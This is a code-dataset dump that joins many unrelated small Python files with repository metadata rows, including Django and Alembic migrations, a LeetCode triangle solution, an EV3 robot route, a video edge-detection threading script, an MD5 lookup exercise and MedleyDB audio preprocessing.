for (k, v) in PSEUDO_DB.items():
simpledb[str(k)] = Toy(data = v,
parent = switchcollector[v['tag']])
app = config.make_wsgi_app()
server = make_server('0.0.0.0', 8080, app)
server.serve_forever()
| [
"[email protected]"
]
| |
218c3c740337ecd6f019cf07d45326d26a037866 | 2437f5e7f243ccf712f94b08f272b7d5387f90cf | /dailyfresh/apps/cart/urls.py | a7e68618919bfccd6fe10436169f4b05ec0e1449 | []
| no_license | KWTsoftkitty/pyCode | b06b128292a2c64e5552c495087693bdd01042c4 | fffa66737ca9ba29b296245767eea8af3ee769d6 | refs/heads/master | 2020-03-25T20:46:45.163930 | 2019-08-30T08:40:27 | 2019-08-30T08:40:27 | 144,145,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | from django.conf.urls import url
from cart.views import CartInfoView, CartAddView, CartUpdateView, CartDeleteView
urlpatterns = [
url(r'^show$', CartInfoView.as_view(), name='show'), # 购物车页面显示
url(r'^add$', CartAddView.as_view(), name='add'), # 购物车添加
url(r'^update$', CartUpdateView.as_view(), name='update'), # 购物车更新
url(r'^delete$', CartDeleteView.as_view(), name='delete'), # 删除购物车记录
]
| [
"[email protected]"
]
| |
c6eafbbe4676917c6f23a05bc73e21e549c0ba3f | 43842089122512e6b303ebd05fc00bb98066a5b2 | /dynamic_programming/120_triangle.py | 99985fab0c45baef506be9737699a9531b32e925 | []
| no_license | mistrydarshan99/Leetcode-3 | a40e14e62dd400ddb6fa824667533b5ee44d5f45 | bf98c8fa31043a45b3d21cfe78d4e08f9cac9de6 | refs/heads/master | 2022-04-16T11:26:56.028084 | 2020-02-28T23:04:06 | 2020-02-28T23:04:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,507 | py | """
Given a triangle, find the minimum path sum from top to bottom. Each step you may move to adjacent numbers on the row below.
For example, given the following triangle
[
[2],
[3,4],
[6,5,7],
[4,1,8,3]
]
The minimum path sum from top to bottom is 11 (i.e., 2 + 3 + 5 + 1 = 11).
"""
class Solution(object):
def minimumTotal_1(self, triangle):
"""
:type triangle: List[List[int]]
:rtype: int
"""
result = []
for line in range(1, len(triangle)):
result.append([0] * line)
result.append(triangle[-1])
for i in reversed(range(len(triangle))):
for j in range(i):
result[i - 1][j] = min(result[i][j], result[i][j+1]) + triangle[i - 1][j]
return result[0][0]
def minimumTotal_2(self, triangle):
# modify the triangle in place
if not triangle:
return
for i in range(len(triangle)-2, -1, -1):
for j in range(len(triangle[i])):
triangle[i][j] = min(triangle[i+1][j], triangle[i+1][j+1]) + triangle[i][j]
return triangle[0][0]
def minimumTotal_3(self, triangle):
# O(n) space
if not triangle:
return
result = triangle[-1]
for i in range(len(triangle) - 2, -1, -1):
for j in range(len(triangle[i])):
result[j] = min(result[j], result[j+1]) + triangle[i][j]
return result[0]
triangle_1 = [[2],[3,4],[6,5,7],[4,1,8,3]]
| [
"[email protected]"
]
| |
c58de3d099facdaa74fbc9362cf2b4d91bbdac3f | 297c6d7f0c15538349e2854c93a9b672836f433a | /routes/route4.py | 9db70781388939fe05282160420b8e727089cc97 | []
| no_license | Utklossning/ev3-robot | 5dec26e72b870589909acfe4a23862930b4a3112 | 1830c19e3406521f3384256137ec7c6e969ed3c0 | refs/heads/master | 2020-04-05T09:47:25.332861 | 2018-11-19T07:37:14 | 2018-11-19T07:37:14 | 156,774,626 | 0 | 0 | null | 2018-11-17T09:10:17 | 2018-11-08T22:01:21 | Python | UTF-8 | Python | false | false | 664 | py | import time
class Route():
def __init__(self, bot):
self.bot = bot
self.route_number = "four"
def start(self):
self.bot.move_forward(45, 50)
self.bot.rotate_right(45, 50)
self.bot.move_forward(44, 50)
self.bot.rotate_right(46, 50)
self.bot.move_forward(28, 50)
self.bot.detect_red_tape()
self.bot.empty_container()
self.bot.move_backward(35, 75)
self.bot.rotate_left(46, 50)
self.bot.move_backward(44, 75)
self.bot.rotate_left(37, 50)
self.bot.move_backward(57, 75)
return True
| [
"[email protected]"
]
| |
bf9f3b6aa1efcc20fe3d0f874b18a994c50a5c78 | 9c84d806af445c9998f3145f07efe5d30b91c815 | /users/migrations/0001_initial.py | f6e88219a642508d9b52bb956e3e985136460980 | []
| no_license | naman114/Django_Blog | c065e50b7e6184e69bc4e2ac19b36c98d6084aea | c97eb63fd4d67df4638ab5766ee76cd5e39023ea | refs/heads/master | 2023-04-18T03:15:47.368787 | 2021-05-04T00:36:02 | 2021-05-04T00:36:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # Generated by Django 3.1.7 on 2021-03-30 20:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(default='default.jpg', upload_to='profile_pics')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
]
| |
38ed67962462a2b1c17e8f0180e3df363f2c1773 | fb3630fa338b304cd951b94375faf6c55a94488e | /msu_map/raw/images/convertPNG.py | bc9ca24e740c4e7995f1d2b56842e474db3cf325 | []
| no_license | Outtascope/MSUPaths_iPhone | 9001fccceccfed791a3d41846eb47424d847890e | 062f20860e949bea72872d912da046774ce6e0a8 | refs/heads/master | 2020-12-07T15:32:38.461826 | 2015-06-18T02:27:02 | 2015-06-18T02:27:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | from PIL import Image
from glob import glob
for imgFile in glob("./*.png"):
try:
img = Image.open(imgFile)
img.save(imgFile,"PNG")
except IOError, msg:
print "Fail at: ", imgFile, " :", msg
| [
"[email protected]"
]
| |
ee0ea350d13c32438c662a8a258423d9b8287956 | 20c4a239e000b15131251d372ccad9110063a961 | /setup.py | 91ea45b7093ebde7a34cf7d5eb933f7529893fdf | [
"MIT"
]
| permissive | Partidani/hdlConvertor | 9d0e382e6e087ac240502538b63f8667004a7715 | 36d3b58e2641e39c323ed9ee337135e49c64d076 | refs/heads/master | 2023-04-06T00:03:31.505727 | 2021-04-19T07:28:25 | 2021-04-19T07:28:25 | 366,418,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,810 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os
from setuptools import find_packages
try:
from skbuild import setup
except ImportError:
raise ImportError("Missing scikit-build, (should be automatically installed by pip)")
import sys
this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, "README.md")) as f:
long_description = f.read()
deps = ["typing", "future"] if sys.version_info[0] == 2 else []
setup(
cmake_args=[
# '-DCMAKE_BUILD_TYPE=Debug'
],
name='hdlConvertor',
version='2.2',
description='VHDL and System Verilog parser written in c++',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Nic30/hdlConvertor',
author='Michal Orsak',
author_email='[email protected]',
keywords=['hdl', 'vhdl', 'verilog', 'system verilog',
'parser', 'preprocessor', 'antlr4'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Topic :: Software Development :: Build Tools',
'Programming Language :: C++',
'Programming Language :: Cython',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)',
],
install_requires=[
'hdlConvertorAst>=0.7',
] + deps,
license="MIT",
packages=find_packages(exclude=["tests", ]),
test_suite="tests.main_test_suite",
test_runner="tests:TimeLoggingTestRunner",
tests_require=deps,
)
| [
"[email protected]"
]
| |
9b0e3331a7b373bdb5062de6b475a67be0194b67 | aca7781f4341a2d9e2c4e9aa663efe1fbfc20b26 | /migration/versions/617d6d1ed309_first.py | b37fe959fe46a7aba66867c3cfa0854280477307 | []
| no_license | rhezaas/hcl-user-service | 23944798939f85b875b8c65fd9a2ce0d33436485 | 3a841e52d4a593a4d2873a19152935f0680cda79 | refs/heads/master | 2023-08-16T23:31:34.994984 | 2021-03-01T16:20:24 | 2021-03-01T16:20:24 | 330,072,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,538 | py | """first
Revision ID: 617d6d1ed309
Revises:
Create Date: 2021-01-09 19:36:33.085083
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '617d6d1ed309'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.execute('CREATE SCHEMA IF NOT EXISTS "user"')
op.create_table(
'user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('firstname', sa.String(length=100), nullable=False),
sa.Column('lastname', sa.String(length=100), nullable=False),
sa.Column('profile', sa.Text(), nullable=True),
sa.Column('phone', sa.String(length=50), nullable=False),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
schema='user'
)
op.create_table(
'account',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('username', sa.String(length=100), nullable=False),
sa.Column('password', sa.String(length=100), nullable=False),
sa.Column('token', sa.String(length=100), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['user.user.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('user_id'),
schema='user'
)
op.create_table(
'image',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('image', sa.Text(), nullable=False),
sa.Column('width', sa.Integer(), nullable=True),
sa.Column('height', sa.Integer(), nullable=True),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['user.user.id'], ),
sa.PrimaryKeyConstraint('id'),
schema='user'
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('image', schema='user')
op.drop_table('account', schema='user')
op.drop_table('user', schema='user')
# ### end Alembic commands ###
| [
"[email protected]"
]
| |
d15e9de176089c15a1ec2cf8cb55e7e06d17da4a | 06b6b2e090724557683e582641acecd3a0eecb59 | /src/calcularfactura.py | 2ee919ca1e1efe9919f7d9d11d9b18a4b891145b | []
| no_license | mmorac/factura | d0f6f8b0c50f74a9c695088d3366ed588c53f2e1 | 9c405575d072d262bdf4db01881701591cbd67d6 | refs/heads/master | 2022-04-25T18:34:49.474668 | 2020-04-24T08:23:43 | 2020-04-24T08:23:43 | 258,345,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,533 | py | import pandas as pd
import obtenerhoras
from datetime import datetime
def calcularfactura(fecha_inicio, fecha_fin):
tabla = obtenerhoras.obtenerhoras("../archivos/factura.xlsx")
if("-" in fecha_inicio):
now = datetime.now()
fecha_inicio = fecha_inicio.split("-")
fecha_fin = fecha_fin.split("-")
if(int(fecha_inicio[1]) > now.month + 1):
f_inicio = str(now.year - 1) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
else:
f_inicio = str(now.year) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
f_fin = str(now.year) + "-" + fecha_fin[1] + "-" + fecha_fin[0]
elif("/" in fecha_inicio):
now = datetime.now()
fecha_inicio = fecha_inicio.split("/")
fecha_fin = fecha_fin.split("/")
f_inicio = str(now.year) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
f_fin = str(now.year) + "-" + fecha_fin[1] + "-" + fecha_fin[0]
agregar = False
sumar = []
for i in range(len(tabla.columns)):
if(tabla.columns[i] == f_inicio):
agregar = True
elif(tabla.columns[i-1] == f_fin):
agregar = False
if(agregar):
sumar.append(tabla.columns[i])
tabla["Total Hours"] = tabla[sumar].sum(axis=1)
tabla["Total"] = tabla["Total Hours"] * tabla["Rate"]
sumar.insert(0, "Rate")
sumar.insert(0, "Resource Name")
sumar.insert(len(sumar), "Total Hours")
sumar.insert(len(sumar), "Total")
resultado = tabla[sumar]
return resultado
| [
"[email protected]"
]
| |
3273285dc5118a47952c40dfdd26e29bd612aa47 | 46f03a8353b3fd0cd1ca35e0d322c4a53649596b | /try.py | 193887977e7feaeaa8f466637561399d7a348948 | []
| no_license | dragikamov/Video_Converter | d7d73a948853c99840606b89fc79dbcf8e1bde97 | e0233f9c190618e30bb85bcfa9df881f0eee058e | refs/heads/master | 2020-04-30T15:50:35.037923 | 2019-03-30T22:35:29 | 2019-03-30T22:35:29 | 176,931,695 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,925 | py | import cv2
import numpy as np
import os
from canny_edge import *
import threading
from os.path import isfile, join
# Function for converting an image to grayscale
def rgb2gray(rgb):
return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])
# Export of video
def exportVid():
frame_array = []
files = [f for f in os.listdir('data/') if isfile(join('data/', f))]
files.sort(key = lambda x: int(x[5:-4]))
for i in range(len(files)):
filename = 'data/' + files[i]
img = cv2.imread(filename)
height, width, _ = img.shape
size = (width,height)
print(filename)
frame_array.append(img)
fourcc = cv2.VideoWriter_fourcc(*'DIVX')
out = cv2.VideoWriter('export.avi', fourcc, 24.0, (width,height))
for i in range(len(frame_array)):
out.write(frame_array[i])
out.release()
def thread(i, imgs):
t1 = threading.Thread(target=detect, args=(imgs[0], i + 1))
t2 = threading.Thread(target=detect, args=(imgs[1], i + 2))
t3 = threading.Thread(target=detect, args=(imgs[2], i + 3))
t4 = threading.Thread(target=detect, args=(imgs[3], i + 4))
t5 = threading.Thread(target=detect, args=(imgs[4], i + 5))
t6 = threading.Thread(target=detect, args=(imgs[5], i + 6))
t7 = threading.Thread(target=detect, args=(imgs[6], i + 7))
t8 = threading.Thread(target=detect, args=(imgs[7], i + 8))
t9 = threading.Thread(target=detect, args=(imgs[8], i + 9))
t10 = threading.Thread(target=detect, args=(imgs[9], i + 10))
t11 = threading.Thread(target=detect, args=(imgs[10], i + 11))
t12 = threading.Thread(target=detect, args=(imgs[11], i + 12))
t13 = threading.Thread(target=detect, args=(imgs[12], i + 13))
t14 = threading.Thread(target=detect, args=(imgs[13], i + 14))
t15 = threading.Thread(target=detect, args=(imgs[14], i + 15))
t16 = threading.Thread(target=detect, args=(imgs[15], i + 16))
t17 = threading.Thread(target=detect, args=(imgs[16], i + 17))
t18 = threading.Thread(target=detect, args=(imgs[17], i + 18))
t19 = threading.Thread(target=detect, args=(imgs[18], i + 19))
t20 = threading.Thread(target=detect, args=(imgs[19], i + 20))
t21 = threading.Thread(target=detect, args=(imgs[20], i + 21))
t22 = threading.Thread(target=detect, args=(imgs[21], i + 22))
t23 = threading.Thread(target=detect, args=(imgs[22], i + 23))
t24 = threading.Thread(target=detect, args=(imgs[23], i + 24))
t25 = threading.Thread(target=detect, args=(imgs[24], i + 25))
t26 = threading.Thread(target=detect, args=(imgs[25], i + 26))
t27 = threading.Thread(target=detect, args=(imgs[26], i + 27))
t28 = threading.Thread(target=detect, args=(imgs[27], i + 28))
t29 = threading.Thread(target=detect, args=(imgs[28], i + 29))
t30 = threading.Thread(target=detect, args=(imgs[29], i + 30))
t31 = threading.Thread(target=detect, args=(imgs[30], i + 31))
t32 = threading.Thread(target=detect, args=(imgs[31], i + 32))
t33 = threading.Thread(target=detect, args=(imgs[32], i + 33))
t34 = threading.Thread(target=detect, args=(imgs[33], i + 34))
t35 = threading.Thread(target=detect, args=(imgs[34], i + 35))
t36 = threading.Thread(target=detect, args=(imgs[35], i + 36))
t37 = threading.Thread(target=detect, args=(imgs[36], i + 37))
t38 = threading.Thread(target=detect, args=(imgs[37], i + 38))
t39 = threading.Thread(target=detect, args=(imgs[38], i + 39))
t40 = threading.Thread(target=detect, args=(imgs[39], i + 40))
t41 = threading.Thread(target=detect, args=(imgs[40], i + 41))
t42 = threading.Thread(target=detect, args=(imgs[41], i + 42))
t43 = threading.Thread(target=detect, args=(imgs[42], i + 43))
t44 = threading.Thread(target=detect, args=(imgs[43], i + 44))
t45 = threading.Thread(target=detect, args=(imgs[44], i + 45))
t46 = threading.Thread(target=detect, args=(imgs[45], i + 46))
t47 = threading.Thread(target=detect, args=(imgs[46], i + 47))
t48 = threading.Thread(target=detect, args=(imgs[47], i + 48))
t49 = threading.Thread(target=detect, args=(imgs[48], i + 49))
t50 = threading.Thread(target=detect, args=(imgs[49], i + 50))
t51 = threading.Thread(target=detect, args=(imgs[50], i + 51))
t52 = threading.Thread(target=detect, args=(imgs[51], i + 52))
t53 = threading.Thread(target=detect, args=(imgs[52], i + 53))
t54 = threading.Thread(target=detect, args=(imgs[53], i + 54))
t55 = threading.Thread(target=detect, args=(imgs[54], i + 55))
t56 = threading.Thread(target=detect, args=(imgs[55], i + 56))
t57 = threading.Thread(target=detect, args=(imgs[56], i + 57))
t58 = threading.Thread(target=detect, args=(imgs[57], i + 58))
t59 = threading.Thread(target=detect, args=(imgs[58], i + 59))
t60 = threading.Thread(target=detect, args=(imgs[59], i + 60))
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t6.start()
t7.start()
t8.start()
t9.start()
t10.start()
t11.start()
t12.start()
t13.start()
t14.start()
t15.start()
t16.start()
t17.start()
t18.start()
t19.start()
t20.start()
t21.start()
t22.start()
t23.start()
t24.start()
t25.start()
t26.start()
t27.start()
t28.start()
t29.start()
t30.start()
t31.start()
t32.start()
t33.start()
t34.start()
t35.start()
t36.start()
t37.start()
t38.start()
t39.start()
t40.start()
t41.start()
t42.start()
t43.start()
t44.start()
t45.start()
t46.start()
t47.start()
t48.start()
t49.start()
t50.start()
t51.start()
t52.start()
t53.start()
t54.start()
t55.start()
t56.start()
t57.start()
t58.start()
t59.start()
t60.start()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
t6.join()
t7.join()
t8.join()
t9.join()
t10.join()
t11.join()
t12.join()
t13.join()
t14.join()
t15.join()
t16.join()
t17.join()
t18.join()
t19.join()
t20.join()
t21.join()
t22.join()
t23.join()
t24.join()
t25.join()
t26.join()
t27.join()
t28.join()
t29.join()
t30.join()
t31.join()
t32.join()
t33.join()
t34.join()
t35.join()
t36.join()
t37.join()
t38.join()
t39.join()
t40.join()
t41.join()
t42.join()
t43.join()
t44.join()
t45.join()
t46.join()
t47.join()
t48.join()
t49.join()
t50.join()
t51.join()
t52.join()
t53.join()
t54.join()
t55.join()
t56.join()
t57.join()
t58.join()
t59.join()
t60.join()
# Loading the video into python
cap = cv2.VideoCapture('bunny.mp4')
# Making a folder for the edited frames
try:
if not os.path.exists('data'):
os.makedirs('data')
except OSError:
print ('Error: Creating directory of data')
currentFrame = 0
imgs = []
height = 0
width = 0
n = 0
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
if not ret:
if(len(imgs) != 0):
for i in range(len(imgs)):
detect(img[i], currentFrame)
break
# Converting the frame to grayscale and adding it to a list
name = './data/frame' + str(currentFrame) + '.jpg'
print ('Slicing and converting to grayscale...' + name)
imgs.append(rgb2gray(frame))
if(currentFrame % 60 == 0 and currentFrame != 0):
thread((currentFrame / 60) - 1, imgs)
imgs = []
# Find height and width
height, width, _ = frame.shape
currentFrame += 1
image_folder = 'data'
images = [img for img in os.listdir(image_folder) if img.endswith(".jpg")]
frame = cv2.imread(os.path.join(image_folder, images[0]))
height, width, _ = frame.shape
exportVid()
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows() | [
"[email protected]"
]
| |
8489d3ddbd733e3678c75d8fcdde182f1b735194 | 60fd4409e031a18bbd65e37d2f7d4d05dcb65caa | /Python/代码实现/day02-多线程进程/13-多线程共享全局变量.py | f28f64bf29e1650b3a00ab9cb41fda8ebe34f421 | []
| no_license | YaoFANGUK/Practice-Code | 1e05310773f9d19f54c2d0197cd613c75defc38c | 01ee0c3f24d505c4fab5b82c52b545933871b950 | refs/heads/master | 2021-06-19T17:02:16.814441 | 2021-06-04T03:38:39 | 2021-06-04T03:38:39 | 222,544,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | # join: 主线程等待add_thread执行完成,再继续向下执行
# 结论:线程之间可以共享全局变量
| [
"[email protected]"
]
| |
0d98db9ec83456db136f54a759d5de5a9a1ccb42 | c42b08296e47e113ea66d8d14b383abccfbce409 | /myhashtry.py | 877c1cafe1784c183cfe3f85b83929bd081b06e3 | []
| no_license | unmutilated/code | 49750a92ec855158740f456b3b1d3dd34890ca88 | 8961e5cf394aecdf71d70cc6b2ff03f35de14db5 | refs/heads/master | 2022-05-24T13:14:37.318698 | 2020-04-27T20:11:08 | 2020-04-27T20:11:08 | 259,436,704 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,308 | py | import sys
import hashlib
Output = []
def ReadFile():
file0 = open("CRY_Lab_02_B_hashes.txt", "r")
lines = f.readlines()
file0.close()
s = set()
for data in lines:
s.add(data.strip())
print("Read in {0} lines from the MD5 hash file".format(len(lines)))
return s
def SaveFile():
file1 = open("Output.txt","w")
file1.writelines(Output)
file1.close
def HashFind():
hashset = ReadFile()
alph = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@"
count = 0
for element in range(0, len(alph)):
m = alph[element]
print(element) #for debuggig
print(len(alph)) #for debugging
h = hashlib.md5(m.encode()).hexdigest()
if h in hashset:
Output.append("{0} Found a hash: {1} hashes to {2}\n".format(count, m, h))
count = count +1
if count >= 1000:
print("All Done")
SaveFile()
sys.exit()
else:
sys.exit()
if __name__ == "__main__":
while True:
userchoice = input("to hash press h [Enter to quit]: ").upper()
if userchoice.startswith("H"):
HashFind()
else:
sys.exit()
| [
"[email protected]"
]
| |
53a4aee6671f14f354522c8971d2917b12424013 | acb5c517f02a6643e276b9c3ddf1a23bf15afc29 | /src/data/data_prep.py | a55851f23be96405cce7041f8149f90d14511382 | []
| no_license | razvannica/instrument-recognition | 13018ec6b403765dc452b9c961c9222967f041ee | a94866b67cc9646ed4633b761dd3440e14ec5f93 | refs/heads/master | 2020-03-20T07:06:47.404105 | 2018-06-13T22:02:58 | 2018-06-13T22:02:58 | 137,271,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,306 | py | import numpy as np
import os
import cPickle
import pandas as pd
import yaml
import wave
import struct
import gc
from scipy.io import wavfile
from scipy.io import savemat
import copy
import patch_label
"""
This file contains all scripts necessary for preparing data.
The code in this file reads all wav files, metadata and annotations for mixed
tracks. And then it takes patches of x seconds each from each track and labels
them.
Finally the resulting raw data is saved to several mat files, each containing
y tracks.
WARNING: If save_size is set to 20 in prep_data(), it takes 2 to 10 min to
read data for one mat file, 3GB memory to keep program running, and
1.5GB disk storage to save one mat file.
If you find yourself out of memory, set save_size to a lower value.
Still looking for more efficient ways to store data.
Need discussion: Too many kinds of instruments (over 80) if use all
"""
def backup_wavfile_reader(fpath):
"""Read wav files when scipy wavfile fail to read.
Args:
fpath (str): path to the wav file to read
Returns:
numpy array: data read from wav file
"""
f = wave.open(fpath, 'rb')
res = []
for i in xrange(f.getnframes()):
frame = f.readframes(1)
x = struct.unpack('=h', frame[:2])[0]
y = struct.unpack('=h', frame[2:])[0]
res.append([x, y])
return np.array(res)
def read_mixed_from_files(dpath, dlist, pickle_file=None):
"""Read the mixed track files and return as dictionary
Args:
dpath (str): path to the directory "MedleyDB/Audio"
dlist (list): list of str, each for one mixed track file
Returns:
dict: in the format of {song_name(string): song_data(numpy array)}
song_data two rows n cols. Each row is a channel, each col is a
time frame.
"""
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i, '{}_MIX.wav'.format(i))
try:
data = wavfile.read(fpath)[1].T
except:
print "Warning: can't read {}, switch to backup reader". \
format(fpath)
data = backup_wavfile_reader(fpath).T
res[i] = np.float32(data)
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def normalize_data(data):
"""Normalize data with respect to each file in place
For each file, normalize each column using standardization
Args:
data (dict): in format of {song_name(string): song_data(numpy array)}
Returns:
N/A
"""
for k in data.keys():
mean = data[k].mean(axis=1).reshape(2, 1)
std = data[k].std(axis=1).reshape(2, 1)
data[k] = np.float32(((data[k] - mean) / std))
def read_activation_confs(path, pickle_file=None):
"""Read the annotation files of activation confidence, return as dictionary
Args:
path (string): path to the directory "MedleyDB"
Returns:
dict: in the format of {song_name(string): annotation(pandas df)}
"""
dpath = os.path.join(path, 'Annotations', 'Instrument_Activations',
'ACTIVATION_CONF')
dlist = os.listdir(dpath)
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i)
annotation = pd.read_csv(fpath, index_col=False)
k = i[:-20].split('(')[0]
k = k.translate(None, "'-")
res[k] = annotation
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def read_meta_data(path, pickle_file=None):
"""Read the metadata for instrument info, return as dictionary
Args:
path (string): path to the directory "MedleyDB"
Returns:
dict: in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
"""
dpath = os.path.join(path, "Audio")
dlist = os.listdir(dpath)
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i, '{}_METADATA.yaml'.format(i))
with open(fpath, 'r') as f:
meta = yaml.load(f)
instrument = {k: v['instrument'] for k, v in meta['stems'].items()}
res[i] = instrument
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def groupMetaData(meta, instGroup):
"""Match instrument number in annotation with real instrument name in meta.
Args:
meta (dict): in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
instGroup (dict): {instrument: instrumentGroup} eg: {'piano': 'struck'}
Returns:
groupedMeta (dict): in the format of
{song_name(string): instrument_map(dict)}
"""
groupedMeta = copy.deepcopy(meta)
for songName in groupedMeta.keys():
for stemName in groupedMeta[songName]:
groupedMeta[songName][stemName] = instGroup[groupedMeta[songName]
[stemName]]
return groupedMeta
def match_meta_annotation(meta, annotation):
"""Match instrument number in annotation with real instrument name in meta.
Note: In the annotation of one mixed track, there can be multiple instances
of the same instrument, in which case the same column name appears
multiple times in the pandas df
Args:
meta (dict): in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
annotation (dict): {song_name(string): annotation(pandas df)}
Returns:
list: containing all instruments involved, sorted in alphebic order
"""
assert(len(meta) == len(annotation))
all_instruments = set()
for k, v in annotation.items():
v.rename(columns=meta[k], inplace=True)
all_instruments.update(v.columns[1:])
return sorted(list(all_instruments))
def split_music_to_patches(data, annotation, inst_map, label_aggr, length=1,
sr=44100, time_window=100.0, binary=False,
threshold=None):
"""Split each music file into (length) second patches and label each patch
Note: for each music file, the last patch that is not long enough is
abandoned.
And each patch is raveled to have only one row.
Args:
data(dict): the raw input data for each music file
annotation(dict): annotation for each music file
calculated as average confidence in this time period
inst_map(dict): a dictionary that maps a intrument name to its correct
position in the sorted list of all instruments
label_aggr(function): a function that defines the way labels for each
sample chunk is generated, default is np.mean
length(int): length of each patch, in seconds
sr (int): sample rate of raw audio
time_window(float): time windows for average (in milliseconds)
Returns:
dict: {'X': np array for X, 'y': np array for y, 'present': np array
of indicators for whether the instrument is present in the
track from which the patch is taken}
"""
res = []
patch_size = sr * length
for k, v in data.items():
for i, e in enumerate(xrange(0, v.shape[1] - patch_size, patch_size)):
patch = v[:, e:patch_size+e].ravel()
sub_df = annotation[k][(i * length <= annotation[k].time) &
(annotation[k].time < (i + 1) * length)]
if label_aggr is not None:
inst_conf = sub_df.apply(label_aggr, 0).drop('time')
else:
inst_conf = patch_label.patch_label(0, length, time_window,
sub_df, binary,
threshold).iloc[0]
label = np.zeros(len(inst_map), dtype='float32')
is_present = np.zeros(len(inst_map), dtype='float32')
for j in inst_conf.index:
temp = inst_conf[j]
# if there are two columns of the same instrument, take maximum
if isinstance(temp, pd.Series):
temp = temp.max()
label[inst_map[j]] = temp
is_present[inst_map[j]] = 1.0
res.append((patch, label, is_present, k, (i*length, (i+1)*length)))
X, y, present, song_name, time = zip(*res)
return {'X': np.array(X), 'y': np.array(y), 'present': np.array(present),
'song_name': song_name, 'time': np.array(time, dtype='float32')}
def prep_data(in_path, out_path=os.curdir, save_size=20, norm_channel=False,
label_aggr=None, start_from=0, groupID='Group 4', **kwargs):
"""Prepare data for preprocessing
Args:
in_path(str): the path for "MedleyDB"
out_path(str): the path to save pkl files, default to be current
save_size(int): the number of wav files contained in each mat
file. Large save_size requires large memory
norm_channel(bool): whehter to normalize each channel locally
label_aggr(function): a function that defines the way labels for each
sample chunk is generated, default is np.mean
start_from(int): the order of file in alphebic order to start reading
from. All files before that are ignored. Used to
continue from the file last read.
kwargs (dict): additional arguments to pass to split_music_to_patches
Returns:
N/A
"""
# save parameters for this run
to_write = ['{} = {}'.format(k, v) for k, v in locals().items()]
with open(os.path.join(out_path, 'config.txt'), 'wb') as f:
f.write('\n'.join(to_write))
# read annotations and match with metadata
anno_pkl = os.path.join(out_path, 'anno_label.pkl')
annotation = read_activation_confs(in_path)
meta = read_meta_data(in_path)
# group instruments in metadata
instGrouping = pd.read_csv('./instGroup.csv')
groupLookup = dict(zip(instGrouping['Instrument'].values,
instGrouping[groupID].values))
meta = groupMetaData(meta, groupLookup)
all_instruments = match_meta_annotation(meta, annotation)
if not os.path.exists(anno_pkl):
with open(anno_pkl, 'w') as f:
cPickle.dump(annotation, f)
# create and save song_instr mapping
song_instr = {}
for k, v in annotation.items():
song_instr[k] = set(v.columns[1:])
